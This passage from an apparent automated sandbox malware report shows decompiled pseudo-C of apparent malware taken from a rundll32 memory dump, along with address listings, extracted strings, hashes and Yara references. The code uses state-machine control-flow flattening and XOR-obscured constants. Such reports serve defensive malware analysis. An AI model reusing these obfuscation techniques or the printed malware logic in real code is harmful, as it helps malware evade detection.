				_v1072 = _v1072 + 0xffffa97a;
				_v1072 = _v1072 ^ 0x00001782;
				_v1140 = 0x7f4b;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 + 0xbe28;
				_v1140 = _v1140 ^ 0x0000c92f;
				_v1092 = 0x4ca3;
				_v1092 = _v1092 + 0x7881;
				_v1092 = _v1092 ^ 0x0000f626;
				_v1180 = 0x8651;
				_v1180 = _v1180 ^ 0xeaabcb2c;
				_v1180 = _v1180 << 2;
				_v1180 = _v1180 | 0xf896c20d;
				_v1180 = _v1180 ^ 0xfabf8607;
				_v1100 = 0x1dc8;
				_v1100 = _v1100 ^ 0x66731512;
				_v1100 = _v1100 ^ 0x66736931;
				_v1200 = 0xc5f3;
				_v1200 = _v1200 + 0x8fc6;
				_v1200 = _v1200 / _t416;
				_v1200 = _v1200 << 0x10;
				_v1200 = _v1200 ^ 0x02e51e11;
				_v1088 = 0x41d6;
				_v1088 = _v1088 + 0x25c7;
				_v1088 = _v1088 ^ 0x000051ef;
				_v1192 = 0xb126;
				_v1192 = _v1192 >> 1;
				_t423 = 0x2c;
				_v1192 = _v1192 * 0x2c;
				_v1192 = _v1192 + 0xd0fb;
				_v1192 = _v1192 ^ 0x00107545;
				_v1144 = 0xb5cd;
				_v1144 = _v1144 << 3;
				_v1144 = _v1144 | 0x639c5b66;
				_v1144 = _v1144 ^ 0x639df74d;
				_v1176 = 0x1cda;
				_v1176 = _v1176 << 0xc;
				_v1176 = _v1176 + 0xc74;
				_v1176 = _v1176 ^ 0x01cd87dc;
				_v1212 = 0xffdf;
				_v1212 = _v1212 ^ 0x705905f0;
				_v1212 = _v1212 + 0x3a87;
				_v1212 = _v1212 ^ 0x4d994128;
				_v1212 = _v1212 ^ 0x3dc37c3b;
				_v1160 = 0xe592;
				_v1160 = _v1160 + 0xffff7af6;
				_v1160 = _v1160 + 0x21a6;
				_v1160 = _v1160 ^ 0x000099fe;
				_v1216 = 0x5d93;
				_v1216 = _v1216 / _t423;
				_t424 = 0x5f;
				_v1216 = _v1216 / _t424;
				_v1216 = _v1216 << 7;
				_v1216 = _v1216 ^ 0x00007af6;
				_v1064 = 0x7bf2;
				_v1064 = _v1064 ^ 0x7bea2743;
				_v1064 = _v1064 ^ 0x7bea7dfd;
				_v1068 = 0x5f87;
				_t425 = 0x58;
				_v1068 = _v1068 * 0x3d;
				_v1068 = _v1068 ^ 0x0016e388;
				_v1136 = 0x6927;
				_v1136 = _v1136 + 0x22cf;
				_v1136 = _v1136 << 0xb;
				_v1136 = _v1136 ^ 0x045f9726;
				_v1080 = 0x5a06;
				_v1080 = _v1080 ^ 0xd495294a;
				_v1080 = _v1080 ^ 0xd495071f;
				_v1168 = 0x67d8;
				_v1168 = _v1168 >> 0xb;
				_v1168 = _v1168 ^ 0xd0f9ebfe;
				_v1168 = _v1168 ^ 0xd0f998db;
				_v1208 = 0x5daf;
				_v1208 = _v1208 ^ 0x72c29f92;
				_v1208 = _v1208 >> 0xb;
				_v1208 = _v1208 >> 4;
				_v1208 = _v1208 ^ 0x0000ccb7;
				_v1148 = 0xaaf5;
				_v1148 = _v1148 / _t425;
				_v1148 = _v1148 + 0xf41b;
				_v1148 = _v1148 ^ 0x0000cf1c;
				_v1060 = 0xbc92;
				_v1060 = _v1060 >> 6;
				_v1060 = _v1060 ^ 0x000059f5;
				_v1132 = 0x5b51;
				_v1132 = _v1132 >> 6;
				_v1132 = _v1132 >> 0xd;
				_v1132 = _v1132 ^ 0x00005492;
				_v1156 = 0x2926;
				_v1156 = _v1156 >> 1;
				_t426 = 0x1d;
				_v1156 = _v1156 / _t426;
				_v1156 = _v1156 ^ 0x00007d93;
				_v1164 = 0xe481;
				_v1164 = _v1164 | 0xb0f0019e;
				_v1164 = _v1164 + 0xffff19a4;
				_v1164 = _v1164 ^ 0xb0ef908e;
				_v1188 = 0xea1c;
				_v1188 = _v1188 << 7;
				_v1188 = _v1188 ^ 0x8bc700c2;
				_v1188 = _v1188 << 3;
				_v1188 = _v1188 ^ 0x5d904ba1;
				_v1196 = 0x497d;
				_v1196 = _v1196 ^ 0x0f8f9f9e;
				_t427 = 0x7d;
				_t417 = _v1056;
				_v1196 = _v1196 / _t427;
				_v1196 = _v1196 + 0xffff7281;
				_v1196 = _v1196 ^ 0x001f1fe0;
				_v1104 = 0xf165;
				_v1104 = _v1104 * 0x1c;
				_v1104 = _v1104 ^ 0x001a318e;
				_v1204 = 0x4454;
				_v1204 = _v1204 << 8;
				_v1204 = _v1204 + 0x9948;
				_v1204 = _v1204 ^ 0x85768e24;
				_v1204 = _v1204 ^ 0x8532788b;
				_v1128 = 0x5a6;
				_v1128 = _v1128 + 0xffff6706;
				_v1128 = _v1128 + 0x96e8;
				_v1128 = _v1128 ^ 0x00003de2;
				_v1112 = 0x9081;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 + 0xffff7063;
				_v1112 = _v1112 ^ 0x000847d9;
				_v1076 = 0xd6df;
				_v1076 = _v1076 ^ 0x5f39b33e;
				_v1076 = _v1076 ^ 0x5f391776;
				_v1120 = 0x3907;
				_v1120 = _v1120 << 9;
				_v1120 = _v1120 ^ 0xf6dcf0ac;
				_v1120 = _v1120 ^ 0xf6aef360;
				_v1084 = 0xfbcd;
				_v1084 = _v1084 + 0x4a35;
				_v1084 = _v1084 ^ 0x000128a7;
				do {
					while(_t471 != 0xd0f27c) {
						if(_t471 == 0xac71cf7) {
							E002A0DE5(_v1112, _v1120, _t417, _v1084);
						} else {
							if(_t471 == 0x213c0eb7) {
								_t406 = E00298B19(_v1188, _a4, _v1196, _t427, _v1104, _v1204, _v1128, _t417,  *_t473,  &_a4);
								_t474 =  &(_t474[8]);
								_t427 = 1;
								_t471 = 0xac71cf7;
								__eflags = _t406;
								_t470 =  !=  ? 1 : _t470;
								continue;
							} else {
								if(_t471 == 0x2e8890c5) {
									_t471 = 0x3b1efd3d;
									continue;
								} else {
									if(_t471 == 0x314b0d7f) {
										_push(_v1192);
										_push(_v1088);
										E0029EF2E(E00296ABA(_v1200, _a4, __eflags), __eflags, _v1176, _v1212,  &_v520, _v1160, 0x104, _a8, _v1216,  &_v1040, _v1056, _v1064);
										_t427 = _v1068;
										E0029F935(_v1068, _t407, _v1136, _v1080);
										_t474 =  &(_t474[0xe]);
										_t471 = 0x35d34524;
										continue;
									} else {
										if(_t471 == 0x35d34524) {
											_t427 = _v1168;
											_t412 = E002A8409(_v1168, _v1172, _v1208, _v1116, _v1148, _v1168, _v1060, _v1132, _v1156, 0, _v1168, _a8, _v1124, _v1164);
											_t417 = _t412;
											_t474 =  &(_t474[0xc]);
											__eflags = _t412 - 0xffffffff;
											if(__eflags != 0) {
												_t471 = 0x213c0eb7;
												continue;
											}
										} else {
											_t483 = _t471 - 0x3b1efd3d;
											if(_t471 != 0x3b1efd3d) {
												goto L15;
											} else {
												E0029DD94(_v1184,  &_v1040, _t483, _t427, _v1108, _v1152);
												_t415 = E002A2089(_v1096, _v1072, _v1140,  &_v1040);
												_t474 =  &(_t474[5]);
												_t471 = 0xd0f27c;
												_t427 = 0;
												 *_t415 = 0;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t470;
					}
					E002A72AE(_v1092,  &_v520, __eflags, _v1180, _v1100);
					_pop(_t427);
					_t471 = 0x314b0d7f;
					L15:
					__eflags = _t471 - 0x365219c3;
				} while (__eflags != 0);
				goto L18;
			}

0x00292746
0x0029274c
0x0029275b
0x0029275d
0x00292768
0x0029276a
0x00292771
0x00292776
0x0029277d
0x00292789
0x0029278e
0x00292799
0x0029279c
0x002927a0
0x002927a8
0x002927b0
0x002927bd
0x002927c1
0x002927c9
0x002927d1
0x002927e1
0x002927e5
0x002927ed
0x002927f9
0x002927fe
0x00292808
0x0029280d
0x00292813
0x0029281b
0x00292823
0x0029282e
0x00292836
0x00292841
0x00292849
0x00292851
0x00292856
0x0029285e
0x00292870
0x00292873
0x0029287a
0x00292885
0x00292890
0x0029289b
0x002928a6
0x002928ae
0x002928b3
0x002928bb
0x002928c3
0x002928ce
0x002928d9
0x002928e4
0x002928ec
0x002928f4
0x002928f9
0x00292901
0x00292909
0x00292914
0x00292921
0x0029292c
0x00292934
0x00292944
0x0029294a
0x0029294f
0x00292957
0x00292962
0x0029296d
0x00292978
0x00292980
0x00292989
0x0029298c
0x00292990
0x00292998
0x002929a0
0x002929a8
0x002929ad
0x002929b5
0x002929bd
0x002929c5
0x002929ca
0x002929d2
0x002929da
0x002929e2
0x002929ea
0x002929f2
0x002929fa
0x00292a02
0x00292a0a
0x00292a12
0x00292a1a
0x00292a22
0x00292a32
0x00292a3a
0x00292a3f
0x00292a45
0x00292a4a
0x00292a52
0x00292a5d
0x00292a68
0x00292a73
0x00292a86
0x00292a87
0x00292a8e
0x00292a99
0x00292aa1
0x00292aa9
0x00292aae
0x00292ab6
0x00292ac1
0x00292acc
0x00292ad7
0x00292adf
0x00292ae4
0x00292aec
0x00292af4
0x00292afc
0x00292b04
0x00292b09
0x00292b0e
0x00292b16
0x00292b24
0x00292b28
0x00292b32
0x00292b3a
0x00292b45
0x00292b4d
0x00292b58
0x00292b60
0x00292b65
0x00292b6a
0x00292b72
0x00292b7a
0x00292b84
0x00292b89
0x00292b8f
0x00292b97
0x00292b9f
0x00292ba7
0x00292baf
0x00292bb7
0x00292bbf
0x00292bc4
0x00292bcc
0x00292bd1
0x00292bd9
0x00292be1
0x00292bed
0x00292bf0
0x00292bf7
0x00292bfb
0x00292c03
0x00292c0b
0x00292c1e
0x00292c25
0x00292c30
0x00292c38
0x00292c3d
0x00292c45
0x00292c4d
0x00292c55
0x00292c5d
0x00292c65
0x00292c6d
0x00292c75
0x00292c7d
0x00292c82
0x00292c8a
0x00292c92
0x00292c9d
0x00292ca8
0x00292cb3
0x00292cbb
0x00292cc0
0x00292cc8
0x00292cd0
0x00292cdb
0x00292ce6
0x00292cf1
0x00292cf1
0x00292d03
0x00292f05
0x00292d09
0x00292d0f
0x00292e9e
0x00292ea5
0x00292ea8
0x00292ea9
0x00292eae
0x00292eb0
0x00000000
0x00292d15
0x00292d1b
0x00292e72
0x00000000
0x00292d21
0x00292d27
0x00292de4
0x00292def
0x00292e44
0x00292e59
0x00292e60
0x00292e65
0x00292e68
0x00000000
0x00292d2d
0x00292d33
0x00292dc3
0x00292dc7
0x00292dcc
0x00292dce
0x00292dd1
0x00292dd4
0x00292dda
0x00000000
0x00292dda
0x00292d35
0x00292d35
0x00292d3b
0x00000000
0x00292d41
0x00292d58
0x00292d77
0x00292d7c
0x00292d7f
0x00292d84
0x00292d86
0x00000000
0x00292d86
0x00292d3b
0x00292d33
0x00292d27
0x00292d1b
0x00292d0f
0x00292f0d
0x00292f19
0x00292f19
0x00292ed1
0x00292ed7
0x00292ed8
0x00292edd
0x00292edd
0x00292edd
0x00000000

Strings

2, xrefs: 002927ED
'i, xrefs: 00292A99
1isf, xrefs: 00292921
}I, xrefs: 00292BD9
5J, xrefs: 00292CDB
TD, xrefs: 00292C30
=, xrefs: 00292C6D
C'{, xrefs: 00292A5D
&), xrefs: 00292B72
Wr, xrefs: 0029285E
Q[, xrefs: 00292B58

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &)$'i$1isf$2$5J$C'{$Q[$TD$Wr$}I$=
API String ID: 0-3037410677
Opcode ID: 84a251be4dabfcd33227d284de61b4534b15d6efb92a4471ff54e871fe9f4b59
Instruction ID: 3271ac2273b648a43df1117a1967e560719b7a687396880730c1d94bea8615f7
Opcode Fuzzy Hash: 84a251be4dabfcd33227d284de61b4534b15d6efb92a4471ff54e871fe9f4b59
Instruction Fuzzy Hash: 37020371509381DFE368CF25C94AA8BFBE1BBC5348F10891DE6D9862A0C7B58919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A7A50, Relevance: 14.1, Strings: 11, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002A7A50(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				unsigned int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t259;
				void* _t290;
				void* _t305;
				short _t306;
				void* _t308;
				signed int _t310;
				signed int _t311;
				void* _t313;
				intOrPtr* _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int* _t366;
				void* _t368;

				_push(_a8);
				_t349 = _a4;
				_push(_t349);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t259);
				_v4 = _v4 & 0x00000000;
				_t366 =  &(( &_v112)[4]);
				_v16 = _v16 & 0x00000000;
				_v8 = 0xc55b8;
				_t313 = 0x7043439;
				_v32 = 0x3521;
				_v32 = _v32 + 0xfffff9a6;
				_v32 = _v32 ^ 0x0000d32e;
				_v40 = 0x5f7c;
				_t353 = 0x3b;
				_v40 = _v40 * 0x32;
				_v40 = _v40 ^ 0x0012febf;
				_v76 = 0xf853;
				_v76 = _v76 << 5;
				_v76 = _v76 / _t353;
				_t354 = 0x6a;
				_v76 = _v76 * 0x58;
				_v76 = _v76 ^ 0x002e2b77;
				_v60 = 0xe655;
				_v60 = _v60 * 0x6d;
				_v60 = _v60 * 0x5b;
				_v60 = _v60 ^ 0x22dc71db;
				_v80 = 0xaa71;
				_v80 = _v80 / _t354;
				_t355 = 0x6d;
				_v80 = _v80 / _t355;
				_v80 = _v80 + 0xcc1e;
				_v80 = _v80 ^ 0x0000f850;
				_v92 = 0x60c8;
				_v92 = _v92 << 3;
				_v92 = _v92 * 0x72;
				_v92 = _v92 | 0x792bb2c2;
				_v92 = _v92 ^ 0x797bd54a;
				_v96 = 0x3920;
				_v96 = _v96 | 0xc0389c27;
				_v96 = _v96 + 0xffff93af;
				_v96 = _v96 ^ 0x9f7d5bb0;
				_v96 = _v96 ^ 0x5f45636f;
				_v100 = 0x52c8;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0x001462cf;
				_v84 = 0xb8f3;
				_v84 = _v84 * 0x51;
				_v84 = _v84 * 0x31;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x0000d58d;
				_v44 = 0x8cd2;
				_v44 = _v44 ^ 0x7e5bfdd3;
				_v44 = _v44 ^ 0x7e5b077c;
				_v64 = 0x85cc;
				_t356 = 0x19;
				_t364 = _v12;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x5d497557;
				_v64 = _v64 ^ 0x5d61ea6d;
				_v88 = 0x1cc;
				_v88 = _v88 | 0xa1b25421;
				_v88 = _v88 << 7;
				_v88 = _v88 * 0x12;
				_v88 = _v88 ^ 0x45054652;
				_v112 = 0x7a7b;
				_v112 = _v112 >> 6;
				_v112 = _v112 + 0xffffebe6;
				_v112 = _v112 | 0xc08d8416;
				_v112 = _v112 ^ 0xffff9857;
				_v68 = 0xa823;
				_v68 = _v68 + 0xffff0029;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xf509c3ed;
				_v48 = 0x9abc;
				_v48 = _v48 / _t356;
				_v48 = _v48 ^ 0x00000dea;
				_v104 = 0xfa7;
				_t357 = 0x1e;
				_v104 = _v104 / _t357;
				_v104 = _v104 ^ 0x620b429a;
				_t358 = 0xe;
				_v104 = _v104 * 0x6e;
				_v104 = _v104 ^ 0x20d623b5;
				_v108 = 0x3bfe;
				_v108 = _v108 << 2;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 / _t358;
				_v108 = _v108 ^ 0x00000f77;
				_v28 = 0x49fd;
				_v28 = _v28 | 0x837d26d6;
				_v28 = _v28 ^ 0x837d0a4a;
				_v52 = 0xc7d9;
				_v52 = _v52 ^ 0x42f910e0;
				_v52 = _v52 << 0xb;
				_v52 = _v52 ^ 0xceb9e8cc;
				_v36 = 0x1b40;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0x06d05680;
				_v56 = 0xe2ef;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x00000fef;
				_v72 = 0xd559;
				_v72 = _v72 << 0xe;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xcaee;
				_v72 = _v72 ^ 0x000161a9;
				_v20 = 0x6e34;
				_t359 = 0x2b;
				_v20 = _v20 / _t359;
				_v20 = _v20 ^ 0x00006ffc;
				_v24 = 0xbad8;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x0002832d;
				_t310 = _v12;
				_t360 = _v12;
				while(1) {
					while(1) {
						L2:
						_t368 = _t313 - 0x242c5c64;
						if(_t368 > 0) {
							break;
						}
						if(_t368 == 0) {
							_push(_t313);
							_push(_t313);
							_t364 = E002A9E2B(_t360 + _t360);
							_t366 =  &(_t366[3]);
							_t290 = 0x15197c39;
							_t313 =  !=  ? 0x15197c39 : 0x154d9440;
							continue;
						} else {
							if(_t313 == 0x7043439) {
								_t313 = 0x347128b1;
								continue;
							} else {
								if(_t313 == 0x9c4599b) {
									_t350 = _v16;
									_t360 = 0;
									_v12 = 0;
									if(_t350 != 0) {
										do {
											_t237 = _t350 + 8; // 0x6e3c
											_t308 = E0029C7EA(_v92, _v96, _t237, _v100);
											_t350 =  *((intOrPtr*)(_t350 + 0x218));
											_t360 = _t360 + 1 + _t308;
										} while (_t350 != 0);
										_v12 = _t360;
										_t290 = 0x15197c39;
									}
									_t313 = 0x242c5c64;
									goto L16;
								} else {
									if(_t313 == _t290) {
										_t351 = _v16;
										_t310 = 0;
										if(_t351 != 0) {
											do {
												_t224 = _t351 + 8; // 0x6e3c
												E0029E056(_t224, _v112, _t310 * 2 + _t364, _v68);
												_t305 = E0029C7EA(_v48, _v104, _t224, _v108);
												_t366 =  &(_t366[4]);
												_t311 = _t310 + _t305;
												_t306 = 0x2c;
												 *((short*)(_t364 + _t311 * 2)) = _t306;
												_t310 = _t311 + 1;
												_t351 =  *((intOrPtr*)(_t351 + 0x218));
											} while (_t351 != 0);
											_t290 = 0x15197c39;
										}
										_t360 = _v12;
										_t313 = 0x24e7e61f;
										L16:
										_t349 = _a4;
										continue;
									} else {
										if(_t313 != 0x154d9440) {
											L29:
											if(_t313 != 0x7703c73) {
												continue;
											} else {
											}
										} else {
											_t352 = _v16;
											if(_t352 != 0) {
												do {
													_t362 =  *(_t352 + 0x218);
													E0029EF80(_v20, _t352, _v24);
													_t352 = _t362;
												} while (_t362 != 0);
											}
											_t349 = _a4;
										}
									}
								}
							}
						}
						L11:
						return 0 |  *_t349 != 0x00000000;
					}
					if(_t313 == 0x24e7e61f) {
						_t314 = _t349 + 4;
						 *(_t349 + 4) =  *(_t349 + 4) & 0x00000000;
						 *_t349 = E0029D668(_v28, _v52, _v32, _t364, _t314, _v36, _t310 - 1);
						_t366 =  &(_t366[5]);
						_t313 = 0x339d5740;
						_t290 = 0x15197c39;
						goto L29;
					} else {
						if(_t313 == 0x339d5740) {
							E0029EF80(_v56, _t364, _v72);
							_t313 = 0x154d9440;
							continue;
						} else {
							if(_t313 != 0x347128b1) {
								goto L29;
							} else {
								E002A76D5(_v40, E002ACBB0, _v76, _v60,  &_v16, _v80);
								_t366 =  &(_t366[4]);
								_t313 = 0x9c4599b;
								while(1) {
									goto L2;
								}
							}
						}
					}
					goto L11;
				}
			}

0x002a7a57
0x002a7a5e
0x002a7a65
0x002a7a66
0x002a7a67
0x002a7a68
0x002a7a6d
0x002a7a75
0x002a7a78
0x002a7a7f
0x002a7a87
0x002a7a8c
0x002a7a94
0x002a7a9c
0x002a7aa4
0x002a7ab3
0x002a7ab6
0x002a7aba
0x002a7ac2
0x002a7aca
0x002a7ad7
0x002a7ae0
0x002a7ae3
0x002a7ae7
0x002a7aef
0x002a7afc
0x002a7b05
0x002a7b09
0x002a7b11
0x002a7b21
0x002a7b29
0x002a7b2c
0x002a7b30
0x002a7b38
0x002a7b40
0x002a7b48
0x002a7b52
0x002a7b56
0x002a7b5e
0x002a7b66
0x002a7b6e
0x002a7b76
0x002a7b7e
0x002a7b86
0x002a7b8e
0x002a7b9b
0x002a7b9f
0x002a7ba4
0x002a7ba9
0x002a7bb1
0x002a7bbe
0x002a7bc7
0x002a7bcb
0x002a7bd0
0x002a7bd8
0x002a7be0
0x002a7be8
0x002a7bf0
0x002a7c01
0x002a7c04
0x002a7c08
0x002a7c0c
0x002a7c14
0x002a7c1c
0x002a7c24
0x002a7c2c
0x002a7c36
0x002a7c3a
0x002a7c42
0x002a7c4a
0x002a7c4f
0x002a7c57
0x002a7c5f
0x002a7c67
0x002a7c6f
0x002a7c77
0x002a7c7c
0x002a7c84
0x002a7c94
0x002a7c98
0x002a7ca0
0x002a7cac
0x002a7cb1
0x002a7cb7
0x002a7cc4
0x002a7cc7
0x002a7ccb
0x002a7cd3
0x002a7cdb
0x002a7ce0
0x002a7ced
0x002a7cf1
0x002a7cf9
0x002a7d01
0x002a7d09
0x002a7d11
0x002a7d19
0x002a7d21
0x002a7d26
0x002a7d2e
0x002a7d36
0x002a7d3b
0x002a7d43
0x002a7d53
0x002a7d58
0x002a7d60
0x002a7d68
0x002a7d6d
0x002a7d72
0x002a7d7a
0x002a7d82
0x002a7d8e
0x002a7d91
0x002a7d95
0x002a7d9d
0x002a7da5
0x002a7daa
0x002a7db2
0x002a7db6
0x002a7dba
0x002a7dbf
0x002a7dbf
0x002a7dbf
0x002a7dc5
0x00000000
0x00000000
0x002a7dcb
0x002a7ef9
0x002a7efa
0x002a7f04
0x002a7f06
0x002a7f10
0x002a7f15
0x00000000
0x002a7dd1
0x002a7dd7
0x002a7edf
0x00000000
0x002a7ddd
0x002a7de3
0x002a7e9d
0x002a7ea1
0x002a7ea3
0x002a7ea9
0x002a7eab
0x002a7eb3
0x002a7ebb
0x002a7ec0
0x002a7ec8
0x002a7ecb
0x002a7ecf
0x002a7ed3
0x002a7ed3
0x002a7ed8
0x00000000
0x002a7de9
0x002a7deb
0x002a7e33
0x002a7e37
0x002a7e3b
0x002a7e3d
0x002a7e4e
0x002a7e54
0x002a7e66
0x002a7e6b
0x002a7e6e
0x002a7e72
0x002a7e73
0x002a7e78
0x002a7e79
0x002a7e7f
0x002a7e83
0x002a7e83
0x002a7e88
0x002a7e8c
0x002a7e91
0x002a7e91
0x00000000
0x002a7ded
0x002a7df3
0x002a7fab
0x002a7fb1
0x00000000
0x00000000
0x002a7fb7
0x002a7df9
0x002a7df9
0x002a7dff
0x002a7e01
0x002a7e0b
0x002a7e11
0x002a7e16
0x002a7e19
0x002a7e01
0x002a7e1d
0x002a7e1d
0x002a7df3
0x002a7deb
0x002a7de3
0x002a7dd7
0x002a7e24
0x002a7e32
0x002a7e32
0x002a7f23
0x002a7f83
0x002a7f86
0x002a7f9c
0x002a7f9e
0x002a7fa1
0x002a7fa6
0x00000000
0x002a7f25
0x002a7f2b
0x002a7f6b
0x002a7f71
0x00000000
0x002a7f2d
0x002a7f33
0x00000000
0x002a7f35
0x002a7f4f
0x002a7f54
0x002a7f57
0x002a7dba
0x00000000
0x002a7dba
0x002a7dba
0x002a7f33
0x002a7f2b
0x00000000
0x002a7f23

Strings

ma], xrefs: 002A7C14
|_, xrefs: 002A7AA4
ocE_, xrefs: 002A7B86
w+., xrefs: 002A7AE7
{z, xrefs: 002A7C42
4n, xrefs: 002A7D82
U, xrefs: 002A7AEF
d\,$, xrefs: 002A7DBF
!5, xrefs: 002A7A8C
), xrefs: 002A7C6F
d\,$, xrefs: 002A7ED8

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !5$)$4n$U$d\,$$d\,$$ma]$ocE_$w+.${z$|_
API String ID: 0-1779222611
Opcode ID: 767adc3ca1d8a36cbd15b8fb110b75a6dc5108bbf6485892776f2a76e32f2f48
Instruction ID: d4dbd22d64e7403cc85b61daf1542675cd573729d7dcbf308095a7bbc29b1807
Opcode Fuzzy Hash: 767adc3ca1d8a36cbd15b8fb110b75a6dc5108bbf6485892776f2a76e32f2f48
Instruction Fuzzy Hash: 0CE142711183428FD328CF25C98951BFBE1BBC5758F608A1DF5969B260C7B4DA1ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 0029E924, Relevance: 14.0, Strings: 11, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E0029E924(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				char _t274;
				void* _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				void* _t319;
				void* _t353;
				intOrPtr _t354;
				char _t355;
				signed int _t356;
				signed int* _t359;

				_t353 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t274 = E0029E171(0);
				_v72 = _t274;
				_t359 =  &(( &_v192)[9]);
				_v84 = _t274;
				_t354 = _t274;
				_v80 = 0x11af16;
				_v76 = 0x9d98f;
				_t319 = 0xc3c7878;
				_v104 = 0x3a17;
				_v104 = _v104 >> 0xb;
				_v104 = _v104 ^ 0x00000407;
				_v160 = 0xc6e9;
				_t310 = 0x4e;
				_v160 = _v160 / _t310;
				_t311 = 0xa;
				_v160 = _v160 / _t311;
				_v160 = _v160 ^ 0x00000061;
				_v116 = 0x5597;
				_v116 = _v116 + 0xffffb377;
				_v116 = _v116 ^ 0x000036c7;
				_v124 = 0x4920;
				_v124 = _v124 ^ 0x6a2619b6;
				_t312 = 0x77;
				_v124 = _v124 * 0x6d;
				_v124 = _v124 ^ 0x32501a9f;
				_v152 = 0xe00d;
				_v152 = _v152 / _t312;
				_v152 = _v152 >> 0xb;
				_v152 = _v152 ^ 0x00006bb9;
				_v140 = 0x38ec;
				_v140 = _v140 + 0xb90e;
				_v140 = _v140 + 0xffff4864;
				_v140 = _v140 ^ 0x00007d65;
				_v176 = 0x59b1;
				_v176 = _v176 ^ 0xc65f560a;
				_v176 = _v176 ^ 0x217efd0e;
				_v176 = _v176 + 0xfffff89a;
				_v176 = _v176 ^ 0xe721e38c;
				_v132 = 0xc712;
				_t313 = 0x78;
				_v132 = _v132 / _t313;
				_v132 = _v132 | 0xa8775bb8;
				_v132 = _v132 ^ 0xa8772a18;
				_v148 = 0xb13e;
				_v148 = _v148 >> 0xd;
				_v148 = _v148 ^ 0xa6c1fe5e;
				_v148 = _v148 ^ 0xa6c1a71d;
				_v88 = 0xefda;
				_v88 = _v88 * 0x57;
				_v88 = _v88 ^ 0x0051c79a;
				_v168 = 0xb9f2;
				_v168 = _v168 + 0x6761;
				_v168 = _v168 | 0xde33d667;
				_t356 = 0x33;
				_t314 = 6;
				_v168 = _v168 * 0x52;
				_v168 = _v168 ^ 0x2ca57843;
				_v184 = 0xf219;
				_v184 = _v184 >> 3;
				_v184 = _v184 >> 0x10;
				_v184 = _v184 ^ 0xfb40b647;
				_v184 = _v184 ^ 0xfb40ecc4;
				_v108 = 0x9add;
				_v108 = _v108 + 0xffff672d;
				_v108 = _v108 ^ 0x000036dd;
				_v172 = 0x9a72;
				_v172 = _v172 + 0xffff8d3f;
				_v172 = _v172 + 0xfffffc02;
				_v172 = _v172 | 0x37908701;
				_v172 = _v172 ^ 0x3790b656;
				_v112 = 0xd99f;
				_v112 = _v112 + 0x4543;
				_v112 = _v112 ^ 0x00016f24;
				_v96 = 0x426a;
				_v96 = _v96 * 0x3b;
				_v96 = _v96 ^ 0x000f351d;
				_v180 = 0x53b8;
				_v180 = _v180 << 8;
				_v180 = _v180 << 7;
				_v180 = _v180 ^ 0x33494c6e;
				_v180 = _v180 ^ 0x1a95151b;
				_v188 = 0xa902;
				_v188 = _v188 ^ 0x50d9c14e;
				_v188 = _v188 / _t356;
				_v188 = _v188 << 0x10;
				_v188 = _v188 ^ 0xd4de4daa;
				_v92 = 0xbb9f;
